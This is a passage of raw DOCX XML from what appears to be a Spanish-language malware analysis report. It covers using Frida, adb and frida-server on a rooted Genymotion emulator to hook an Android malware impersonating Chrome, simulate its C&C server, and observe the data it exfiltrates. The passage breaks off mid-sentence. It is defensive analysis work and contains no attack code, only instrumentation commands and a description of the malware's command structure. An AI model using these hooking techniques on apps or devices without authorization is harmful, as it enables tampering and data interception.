          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="007D136E" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">n este caso comenzaremos por instrumentar mediante Frida algunas de las operaciones del malware para guiarlo hacia un comportamiento concreto y observar qué tipo de operaciones y datos realiza. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D61B18" w14:textId="71331B41" w:rsidR="00BE4787" w:rsidRPr="009150FE" w:rsidRDefault="00BE4787" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una opción sería crear un servidor completo C&amp;C local que enviase los comandos directamente al malware, pero debido a la complejidad adicional se ha optado por utilizar Frida para instrumentar el código del malware y simular las respuestas del servidor. Para ello se realizarán operaciones conocidas como “</w:t>
      </w:r>
      <w:r w:rsidRPr="00697DCA">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>hooking</w:t>
      </w:r>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">” que sirven para alterar los métodos del código, en este caso Java, a través de código JavaScript. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D0F10" w14:textId="146AC145" w:rsidR="00BE4787" w:rsidRPr="009150FE" w:rsidRDefault="00BE14B2" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En primer lugar, debemos iniciar la herramienta </w:t>
      </w:r>
      <w:r w:rsidR="00BA00B0" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rida-server</w:t>
      </w:r>
      <w:r w:rsidR="00BA00B0" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que forma parte de la suite Frida, </w:t>
      </w:r>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en el dispositivo emulado. Ya que est</w:t>
      </w:r>
      <w:r w:rsidR="00C06EBC" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>as operaciones</w:t>
      </w:r>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> requiere</w:t>
      </w:r>
      <w:r w:rsidR="00C50C16" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>n de</w:t>
      </w:r>
      <w:r w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> permisos de superusuario al necesitar ejecutar un binario directamente en el dispositivo, para esta fase del análisis se utilizarán los dispositivos emulados de Genymotion en lugar de los de Android Studio, ya que los primeros cuentan con la opción de habilitar el modo superusuario.</w:t>
      </w:r>
      <w:r w:rsidR="008129C5" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se siguen los siguientes pasos utilizando la herramienta adb para enviar al dispositivo emulado el binario </w:t>
      </w:r>
      <w:r w:rsidR="00A15B54" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="008129C5" w:rsidRPr="009150FE">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rida-server y posteriormente ejecutarlo con los permisos adecuados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415DCA71" w14:textId="113CCC20"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adb push Frida-server /data/local/temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039FA059" w14:textId="44ADABCA"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adb shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E07AF" w14:textId="39F5CF8E"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lastRenderedPageBreak/>
        <w:t>chmod 755 /data/local/tmp/</w:t>
      </w:r>
      <w:r w:rsidR="00BA00B0" w:rsidRPr="00A15B54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15B54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rida-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DA322" w14:textId="648B9F3A" w:rsidR="008129C5" w:rsidRPr="00A15B54" w:rsidRDefault="008129C5" w:rsidP="00C36344">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A15B54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cd /data/local/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5F5434" w14:textId="22517253" w:rsidR="008129C5" w:rsidRPr="00247CCD" w:rsidRDefault="008129C5" w:rsidP="00D90BB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A15B54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidR="00BA00B0" w:rsidRPr="00A15B54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15B54">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rida-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE7DBA" w14:textId="180A8F04" w:rsidR="008129C5" w:rsidRPr="00152E39" w:rsidRDefault="008129C5" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Tras aplicar estos pasos contamos con la utilidad frida-server lista en el dispositivo emulado y esperando la conexión con Frida desde nuestro ordenador para realizar la instrumentación. </w:t>
      </w:r>
      <w:r w:rsidR="00572627" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Frida se acoplará a un proceso existente en el dispositivo emulado y ejecutará el código JavaScript que le enviemos para instrumentar las operaciones.</w:t>
      </w:r>
      <w:r w:rsidR="0058122F" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Para determinar el proceso del malware utilizamos la utilidad frida-ps con la opción -U, que nos proporciona la lista de procesos ejecutándose en el sistema Android. En este caso el malware no es reconocido con el nombre del paquete com.busy.lady, sino que utiliza el nombre de la aplicación suplantada, es decir “Chrome”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D003BAE" w14:textId="26D7DE34" w:rsidR="008C6A53" w:rsidRPr="00152E39" w:rsidRDefault="00B71EB5" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A la hora de utilizar Frida se necesitan especificar los nombres de clases y métodos reales del código, que en este caso se encuentran ofuscados. Con JADX podemos acceder a ellos pese a haberlos renombrado previamente en el análisis estático, pero también podemos utilizar un script de Frida para obtener el desglose de métodos para una clase determinada, lo cual simplificará la tarea. Creamos un pequeño fichero JavaScript que llamamos “methodBreakdown.js”, que obtendrá la lista completa a partir de una clase base que elijamos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19993938" w14:textId="3B6F9489" w:rsidR="009B5D8D" w:rsidRPr="00152E39" w:rsidRDefault="00F80F4E" w:rsidP="00D90BB6">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez tenemos la lista de métodos y clases que queremos instrumentar, podemos pasar a las operaciones específicas. </w:t>
      </w:r>
      <w:r w:rsidR="00394E97" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Los pasos que seguir</w:t>
      </w:r>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> serán los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A328D4" w14:textId="2FE2F48C" w:rsidR="00F80F4E" w:rsidRPr="00152E39" w:rsidRDefault="00F80F4E" w:rsidP="00702899">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Instrumentar el </w:t>
      </w:r>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00702899" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">o función de llamada de vuelta </w:t>
      </w:r>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a las peticiones al servidor C&amp;C para cómo espera el malware que estén estructurados los datos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500BF63" w14:textId="4EFE4F0E" w:rsidR="00F80F4E" w:rsidRPr="00152E39" w:rsidRDefault="00F80F4E" w:rsidP="00702899">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Instrumentar el formateo de comandos que realiza el malware para poder incluir comandos que reconozca.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1109C4" w14:textId="0D2B9E44" w:rsidR="00F80F4E" w:rsidRPr="00152E39" w:rsidRDefault="00F80F4E" w:rsidP="00702899">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Instrumentar el envío de datos exfiltrados al servidor C&amp;C para observar estos datos. Estos paquetes enviados serán también analizados paralelamente con Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0D288D" w14:textId="3869AD40" w:rsidR="00A059C1" w:rsidRPr="00152E39" w:rsidRDefault="00A059C1" w:rsidP="00A059C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Para la primera instrumentación </w:t>
      </w:r>
      <w:r w:rsidR="00B31549" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>creamos un fichero “</w:t>
      </w:r>
      <w:r w:rsidR="00B31549" w:rsidRPr="000518F1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>hookServerResponse.js</w:t>
      </w:r>
      <w:r w:rsidR="00B31549" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">” donde realizamos un acople a la función de </w:t>
      </w:r>
      <w:r w:rsidR="00B31549" w:rsidRPr="000518F1">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:r w:rsidR="00B31549" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y modificamos la </w:t>
      </w:r>
      <w:r w:rsidR="00B31549" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>respuesta del servidor para que solicite los comandos deseados. La estructura que utiliza el malware para comunicarse es JSON, con un objeto llamado “</w:t>
      </w:r>
      <w:r w:rsidR="00B31549" w:rsidRPr="00E05627">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="00B31549" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” que contiene los comandos a enviar al malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264DECF5" w14:textId="3E2BB0BA" w:rsidR="00B31549" w:rsidRPr="00152E39" w:rsidRDefault="00B31549" w:rsidP="00A059C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la segunda</w:t>
      </w:r>
      <w:r w:rsidR="00174AF3" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> instrumentación</w:t>
      </w:r>
      <w:r w:rsidR="004B1635" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F367A" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>analizamos para imprimir por pantalla el formateo que realiza el malware a los comandos recibidos. Estos comandos serán los que posteriormente sean evaluados por la clase “</w:t>
      </w:r>
      <w:r w:rsidR="006F367A" w:rsidRPr="00E05627">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DataExfiltrationController</w:t>
      </w:r>
      <w:r w:rsidR="006F367A" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>” para realizar las acciones ordenadas. Los comandos finales tras el formato son una lista de cadenas, con el primer elemento siendo el comando principal y las cadenas adicionales sirviendo de subcomandos, creando el abanico de opciones explicadas en el análisis estático y recogidas en la tabla correspondiente del anexo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3BBB71" w14:textId="7ACB3D19" w:rsidR="00E35A33" w:rsidRPr="00152E39" w:rsidRDefault="00E35A33" w:rsidP="00A059C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Por último, tras evaluar el malware los comandos y realizar las operaciones necesarias, también queremos instrumentar la respuesta que envía finalmente al servidor remoto para poder ver sus contenidos</w:t>
      </w:r>
      <w:r w:rsidR="00617808" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> previ</w:t>
      </w:r>
      <w:r w:rsidR="005351D7" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>amente</w:t>
      </w:r>
      <w:r w:rsidR="00617808" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a su envío por red.</w:t>
      </w:r>
      <w:r w:rsidR="005351D7" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esta instrumentación se realiza en el fichero “</w:t>
      </w:r>
      <w:r w:rsidR="005351D7" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>hookSendToServer.js</w:t>
      </w:r>
      <w:r w:rsidR="005351D7" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE4B4B" w14:textId="0364237A" w:rsidR="00325F9E" w:rsidRPr="00152E39" w:rsidRDefault="00325F9E" w:rsidP="00A059C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para aplicar estos ficheros de Frida al malware en ejecución, se realiza directamente desde la línea de comandos con la utilidad, siempre y cuando el servidor del dispositivo, es decir la herramienta frida-server explicada previamente, se encuentre activa. Para lanzar un script específico se utiliza el siguiente comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FF83F4" w14:textId="686FED06" w:rsidR="00325F9E" w:rsidRPr="00152E39" w:rsidRDefault="00325F9E" w:rsidP="00A059C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">frida -U Chrome -l </w:t>
      </w:r>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="cs"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>hookServerResponse.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73966ABD" w14:textId="666C3F8C" w:rsidR="00325F9E" w:rsidRPr="00152E39" w:rsidRDefault="00325F9E" w:rsidP="00A059C1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Tras </w:t>
      </w:r>
      <w:r w:rsidR="00E16DC0" w:rsidRPr="00152E39">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS" w:cs="Courier New"/>
